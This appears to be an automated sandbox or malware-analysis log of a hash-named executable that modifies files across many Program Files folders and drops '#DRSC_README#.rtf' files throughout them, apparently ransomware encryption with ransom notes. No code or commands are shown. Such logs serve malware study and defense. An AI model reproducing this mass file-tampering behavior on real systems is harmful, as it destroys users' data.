C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Beulah 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jinfo.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UCT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4.ssl_1.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Toronto 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\wab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-US.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Louisville 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\El_Aaiun 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\La_Paz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\flavormap.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Almaty 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Macquarie 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar 